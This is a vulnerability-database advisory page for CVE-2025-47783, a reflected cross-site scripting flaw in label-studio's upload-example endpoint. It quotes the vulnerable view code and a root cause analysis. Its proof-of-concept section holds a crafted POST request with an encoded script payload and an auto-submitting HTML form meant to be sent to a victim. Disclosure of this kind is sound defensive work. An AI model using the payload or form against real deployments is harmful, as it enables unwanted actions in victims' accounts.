N/A

CVSS Score

-

CVSS Score

Basic Information

CVE ID

CVE-2025-47783

GHSA ID

GHSA-8jhr-wpcm-hh4h

EPSS Score

0.22238%

CWE

CWE-79

Published

5/15/2025

Updated

5/15/2025

KEV Status

Technology

Python

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-47783

CVE-2025-47783: label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter.

Summary

The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other attacks.

Details

The vulnerability is reproducible when sending a properly formatted request to the POST /projects/upload-example/ endpoint. In the source code, the vulnerability is located at label_studio/projects/views.py.

39: @require_http_methods(['POST'])
40: def upload_example_using_config(request):
41:     """Generate upload data example by config only"""
42:     config = request.POST.get('label_config', '')
43: 
44:     org_pk = get_organization_from_request(request)
45:     secure_mode = False
46:     if org_pk is not None:
47:         org = generics.get_object_or_404(Organization, pk=org_pk)
48:         secure_mode = org.secure_mode
49: 
50:     try:
51:         Project.validate_label_config(config)
52:         task_data, _, _ = get_sample_task(config, secure_mode)
53:         task_data = playground_replacements(request, task_data)
54:     except (ValueError, ValidationError, lxml.etree.Error):
55:         response = HttpResponse('error while example generating', status=status.HTTP_400_BAD_REQUEST)
56:     else:
57:         response = HttpResponse(json.dumps(task_data))
58:     return response

The vulnerability is specifically located in line 57, where HttpResponse is used.

57:         response = HttpResponse(json.dumps(task_data))

PoC

Send the following request after changing the {host} to your own.

POST /projects/upload-example/ HTTP/1.1
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22$textjmwwi%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e

Or you can create a vulnerable HTML page by changing {domain} beforehand, which can later be sent to the victim.

<html>
  <body>
    <form action="http://{domain}/projects/upload-example/" method="POST">
      <input type="hidden" name="label&#95;config" value="&lt;View&gt;&lt;Text&#32;name&#61;&quot;text&quot;&#32;value&#61;&quot;&#36;textjmwwi&amp;lt&#59;script&amp;gt&#59;alert&#40;1&#41;&amp;lt&#59;&#47;script&amp;gt&#59;s8m37&quot;&#47;&gt;&lt;&#47;View&gt;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

Malicious code execution: The user may be forced to perform unwanted actions within their Label Studio account. This includes accessing document.cookie, but note that Label Studio session cookies are marked http-only, mitigating any possibility of session theft.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-47783

CVE-2025-47783:

N/A

CVSS Score

-

CVSS Score

Basic Information

CVE ID

CVE-2025-47783

GHSA ID

GHSA-8jhr-wpcm-hh4h

EPSS Score

0.22238%

CWE

CWE-79

Published

5/15/2025

Updated

5/15/2025

KEV Status

Technology

Python

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
label-studio	pip	< 1.18.0	1.18.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability description explicitly points to the upload_example_using_config function in label_studio/projects/views.py as the location of the XSS. The label_config parameter is taken from the POST request and used to generate task_data. This task_data is then included in an HttpResponse. The provided PoC demonstrates injecting a script via label_config. The commit information shows that the function upload_example_using_config and its corresponding URL route /projects/upload-example/ were entirely removed. This removal is the fix for the vulnerability, confirming that this function was indeed the vulnerable one.

The function playground_replacements is also removed in the patch. While it processes task_data which originates from user input, the primary vulnerability lies in upload_example_using_config directly using the unsanitized input in the HTTP response. playground_replacements itself doesn't seem to introduce the XSS, but rather modifies the data that is later used in the vulnerable response. Since the entire endpoint and its main processing function upload_example_using_config are removed, playground_replacements is removed as it's no longer used in this context. The core vulnerability is the direct use of task_data in HttpResponse within upload_example_using_config.

The other removed code in label_studio/core/all_urls.json and label_studio/projects/urls.py are URL routing configurations that direct requests to the vulnerable upload_example_using_config function. Their removal is part of the mitigation by making the vulnerable endpoint inaccessible.

The removed test file label_studio/tests/sample_tasks.tavern.yml contained tests for the now-deleted upload_example_using_config endpoint, further confirming its role and subsequent removal.

Therefore, the single most direct vulnerable function identified from the patch and description is upload_example_using_config.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

N/A

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-47783: label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter.

Summary

Details

PoC

Impact

CVE-2025-47783:

N/A

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

CVE-2025-47783: label-studio vulnerable to Cross-Site Scripting (Reflected) via the label_config parameter.

Summary

Details

PoC

Impact

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

N/A

N/A

Technical Details

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI